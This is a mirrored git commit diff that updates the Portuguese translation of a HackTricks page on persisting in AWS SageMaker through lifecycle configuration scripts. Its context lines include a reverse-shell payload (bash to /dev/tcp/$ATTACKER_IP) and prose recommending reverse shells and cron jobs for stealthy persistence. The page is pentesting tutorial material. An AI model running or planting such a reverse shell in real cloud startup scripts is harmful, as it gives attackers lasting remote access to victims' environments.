mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-02-04 11:07:37 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-sagem
This commit is contained in:
@@ -1,4 +1,4 @@
|
||||
# AWS - Persistência da Configuração do Ciclo de Vida do SageMaker
|
||||
# AWS - SageMaker Lifecycle Configuration Persistence
|
||||
|
||||
## Visão Geral das Técnicas de Persistência
|
||||
|
||||
@@ -70,9 +70,9 @@ aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --s
|
||||
}
|
||||
}'
|
||||
```
|
||||
## Tipos de Configurações de Ciclo de Vida de Aplicativos do Studio
|
||||
## Tipos de Configurações de Ciclo de Vida do Aplicativo Studio
|
||||
|
||||
As configurações de ciclo de vida podem ser aplicadas especificamente a diferentes tipos de aplicativos do SageMaker Studio:
|
||||
As configurações de ciclo de vida podem ser aplicadas especificamente a diferentes tipos de aplicativos SageMaker Studio:
|
||||
* JupyterServer: Executa scripts durante a inicialização do servidor Jupyter, ideal para mecanismos de persistência como shells reversos e jobs cron.
|
||||
* KernelGateway: Executa durante o lançamento do aplicativo de gateway de kernel, útil para configuração inicial ou acesso persistente.
|
||||
* CodeEditor: Aplica-se ao Editor de Código (Code-OSS), permitindo scripts que são executados no início das sessões de edição de código.
|
||||
@@ -118,7 +118,7 @@ nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &
|
||||
```
|
||||
## Persistência de Cron Job via Configuração de Ciclo de Vida
|
||||
|
||||
Um atacante pode injetar cron jobs através de scripts LCC, garantindo a execução periódica de scripts ou comandos maliciosos, permitindo uma persistência furtiva.
|
||||
Um atacante pode injetar cron jobs através de scripts LCC, garantindo a execução periódica de scripts ou comandos maliciosos, permitindo uma persistência discreta.
|
||||
|
||||
### Exemplo de Payload:
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user